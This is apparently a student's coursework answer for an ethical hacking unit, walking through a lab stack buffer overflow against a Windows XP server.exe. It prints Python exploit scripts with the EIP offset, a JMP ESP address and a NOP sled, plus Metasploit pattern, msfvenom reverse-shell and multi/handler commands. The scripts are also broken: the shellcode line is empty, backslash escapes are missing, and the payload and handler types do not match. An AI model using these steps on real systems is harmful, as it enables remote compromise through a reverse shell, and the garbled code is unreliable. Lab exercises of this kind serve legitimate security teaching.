CSI3508 Ethical Hacking And Defence

You are to write a technical outline of how the exploit you developed in the workshop operates, from the initial connection, through to compromise.

 

You should target a primarily non-technical audience in your report.

Answer:

For the preparation of the workshop two virtual machine is setup in VmWare i.e. Kali Linux and Windows XP and for both the machines the network configuration is set to NAT. The configuration NAT enables the private IP to be connected with the internet and enable communication. The IP address are checked for enabling communication between the machines and on the windows machine the immunity debugger is opened for running the python script and loading the server.exe and executed.

Then in the next step the kali linux is used for creating a file using the vi editor and is named as attack.py. The code given in the workshop is inserted in the file that is given below:

#!/usr/bin/python

import sys

import os

import socket

host = sys.argv[1]

port = int(sys.argv[2])

# Testing

buffer = "x41"*500

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

con = s.connect((host, port))

s.send(buffer)

s.close()

The command “python attack.py 192.168.0.57 1337” is executed for proceeding with the attack. The IP address used is the IP address of the windows host. In the windows machine the keys shift + F9 is pressed for passing the exception and execution of the code. A sample result is found that is given in the following screenshot where the EIP values changes to the value used by the attacker and it is also similar for the EBP value. 

The ESP is used for pointing to a certain region of memory and it contains the value that is injected by the attacker.

For weaponizing the vulnerability the immunity debugger is used and the server .exe is restarted and the execution is started. In the command line interface of the kali linux machine the following command “cd /usr/share/metasploit-framework/tools/exploit”is used for entering into the metasploit framework. The command “./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337” is executed within Kali linux for getting the access of the windows host machine. On the other hand ialeun the windows the shift + F9 is pressed for adding the exception and the result is viewed for the identification of the EIP value. For the determination of the offset value of the EIP the command “./pattern_offset.rb -l 5000 -q 37694136” is used and the returned result is noted. For the given case it is 260 and depending on this the address for the code is determined that jumps to the ESP. The ESP is used for the representation of the pointer for a memory for the management of the control. The server.exe is restarted by pressing the CTRL + F2 and F9 is pressed after starting the immunity debugger. For viewing the executable modules ALT+ E is pressed in the windows virtual machine. A searching is done for the JMP ESP and if the result contains GDI 32 the memory address is noted. The attack code in the kali linux machine is modified according to the workshop and the commands is:

#!/usr/bin/python

import sys

import os

import socket

host = sys.argv[1]

port = int(sys.argv[2])

# EIP is overwritten at 260 bytes

buffer = "x41"*260

# Overwrite EIP with JMP ESP

buffer += "x78x16xF3x77"

# NOPSLED

buffer += "x90"*128

# Shellcode

buffer +=

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

con = s.connect((host, port))

s.send(buffer)

s.close()

The command “msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.2 -e x86/shikata_ga_nai -b 'x00xffx0ax0bx0d' -i 3 -f python” is used and exploitation is performed. For the exploitation the code msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.2; exploit" is used and on the windows client the immunity debugger is closed. The modified python code is executed wit the IP address of the client for the completion of the workshop.

Bibliography

Cyber Security - CII ICT East 2017 | Ethical Hacking India | Ethical Hacking Institutes In India | Ethical Hacking Courses | Ethical Hacking Course In Kolkata - ISOEH. (2018). Isoeh.com. Retrieved 21 September 2018, from https://www.isoeh.com/CII-ICT-East-2017-cyber-security.html

Definitions, E., & Hope, C. (2018). What is Ethical Hacking and an Ethical Hacker?. Computerhope.com. Retrieved 21 September 2018, from https://www.computerhope.com/jargon/e/ethihack.htm

Ethical Hacking - Computing and Software Wiki. (2018). Wiki.cas.mcmaster.ca. Retrieved 21 September 2018, from https://wiki.cas.mcmaster.ca/index.php/Ethical_Hacking

Ethical Hacking - ICT Issue. (2018). Sikandar's E-Portfolio. Retrieved 21 September 2018, from https://sikandarbttportfolio.weebly.com/ethical-hacking---ict-issue.html

Freeman, R. (2016). Ethical hacking: what is it, and why would I need it?. IT Governance Blog. Retrieved 21 September 2018, from https://www.itgovernance.co.uk/blog/ethical-hacking-what-is-it-and-why-would-i-need-it/

What is ethical hacker? - Definition from WhatIs.com. (2018). SearchSecurity. Retrieved 21 September 2018, from https://searchsecurity.techtarget.com/definition/ethical-hacker